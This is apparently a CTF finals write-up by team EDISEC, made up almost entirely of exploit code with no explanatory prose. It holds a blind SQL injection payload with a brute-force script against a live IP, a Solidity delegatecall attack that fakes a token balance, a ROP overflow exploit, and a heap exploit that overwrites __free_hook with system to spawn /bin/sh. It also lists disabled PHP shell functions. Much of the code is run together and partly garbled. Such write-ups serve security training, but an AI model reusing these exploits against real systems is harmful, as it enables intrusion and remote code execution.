2022第五空间CTF决赛WriteUp By EDISEC

disable_funcpcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld

2'%26%26(ord(substr((select(group_concat(table_name))from(sys.schema_table_statistics_with_buffer)where(table_schema)like'web2') %26%26'1

import requestsimport datetimeproxies = {"http":"127.0.0.1:8080","https":None}if __name__=='__main__':    # 在此更改攻击url    url="http://39.107.82.142:34754/index.php?id="    str1='!#()-.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz{}'    tmp=""    while True:        for i in range(0,len(str1)):            sql="2'%26%26((select*from(users)limit/**/1)<(select/**/'administrator',binary'{}'))%26%26'1".format(tmp+str1[i])            sql_url=url+sql            r=requests.get(sql_url,proxies=proxies)            if 'alice' in r.text:                tmp=tmp+str1[i-1]                print(tmp)                break

// SPDX-License-Identifier: UNLICENSEDpragma solidity 0.8.0;import "@openzeppelin/contracts/token/ERC20/ERC20.sol";import "@openzeppelin/contracts/access/Ownable.sol";contract CTFToken is ERC20,Ownable {    bool airdropped;    constructor() ERC20("CTFToken", "CTF") {        _mint(address(msg.sender), 100000000000);    }    function airdrop(uint num) public onlyOwner {        require(!airdropped, "Already airdropped");        airdropped = true;        _mint(msg.sender, num);    }}contract  Vuln {    CTFToken public  token;    bool solved;    constructor()  public  {        token=new CTFToken();    }    function set(address _contract) public  {
        (bool success, bytes memory data) = _contract.delegatecall(            abi.encodeWithSignature("set()")        );        require(success, "delegatecall  failed");        require(!solved, "");    }    function solve() public{        require(token.balanceOf(msg.sender)>=100000000000);        solved=true;    }    function isSolved()  public view returns(bool){        return solved;    }}

contract token1{    function balanceOf(address _address) public view returns(uint256){        return 900000000009;    }}
contract attck{    address public token;    function set() public{        token=0x792d61a0A3AfE70aE16A72FA98c94213C13f647f;    }}

#coding:utf-8from pwn import *context.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''  '''if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :  io=remote('39.107.68.43',42324)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')  # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)# io.recv()pay='a'*0x18+p64(0x4011FF)+p64(0x401176)io.sendline(pay)# libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-88-0x10# libc.address=libc_base# bin_sh_addr=libc.search('/bin/shx00').next()# system_addr=libc.sym['system']# free_hook_addr=libc.sym['__free_hook']# success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./pwn'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch    gdb_text='''      b fputs      '''    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.31.so')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/lib/x86_64-linux-gnu/libc-2.31.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.31.so')      io=remote('39.106.154.197',29493)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc.so.6')      # ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)    def choice(a):      io.sendlineafter('>> ',str(a))    def add(a):      choice(1)      io.sendafter('Name:n',a)      def edit(a):      choice(3)      io.sendafter('n',a)    def show(a):      choice(4)      io.sendafter('n',a)    def delete(a):      choice(2)      io.sendafter('Name:n',a)    for i in range(7):      edit('k'*0xe0)      show('n')    add('aaa')    edit('k'*0xe0)    show('n')    add('aaa')    add('bbb')    delete('aaa')    edit('k'*0xe0)    add('a'*0x68)    stderr=0xc0    for i in range(0x10):      delete('a'*0x68+'xc0'+p8(0x5+i*0x10))      kk=io.recvuntil('add')      if 'Not found' in kk :        continue      else :        stderr+=((0x5+i*0x10)<<8)        break    add('a'*0x68)    for i in range(0x100):      delete('a'*0x68+p16(stderr)+p8(i))      kk=io.recvuntil('add')      if 'Not found' in kk :        continue      else :        stderr+=(i<<0x10)        break    add('a'*0x68)    for i in range(0x100):      delete('a'*0x68+p64(stderr)[:3]+p8(i))      kk=io.recvuntil('add')      if 'Not found' in kk :        continue      else :        stderr+=(i<<0x18)        break    add('a'*0x68)    for i in range(0x100):      delete('a'*0x68+p64(stderr)[:4]+p8(i))      kk=io.recvuntil('add')      if 'Not found' in kk :        continue      else :        stderr+=(i<<0x20)        break    stderr+=(0x7f<<0x28)    libc_base=stderr-libc.sym['_IO_2_1_stderr_']    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    free_hook_addr=libc.sym['__free_hook']    add('x00'*0x68)    show('n')    edit('k'*0xe0)    show('n')    edit('k'*0xe0)    show('n')    add(p64(free_hook_addr))    add('/bin/shx00')    add(p64(system_addr))    delete('/bin/shx00')    # success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))    gdb_attach(io,gdb_text)    io.interactive()  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue